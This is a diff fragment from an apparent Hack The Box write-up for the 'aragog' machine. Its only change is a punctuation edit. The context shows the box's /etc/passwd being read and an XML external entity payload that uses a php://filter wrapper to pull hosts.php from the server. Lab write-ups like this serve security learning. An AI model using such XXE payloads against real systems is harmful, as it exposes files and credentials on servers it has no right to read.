Kyuu-Ji/htb-write-up/aragog/write-up-aragog.md

 This displays the contents of the _/etc/passwd_ file.
 There are two non-default users on the box that could be useful later called _cliff_ and _florian_.

-Also interesting is the content of the _hosts.php_:
+Also interesting is the content of the _hosts.php_.
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/hosts.php"> ]>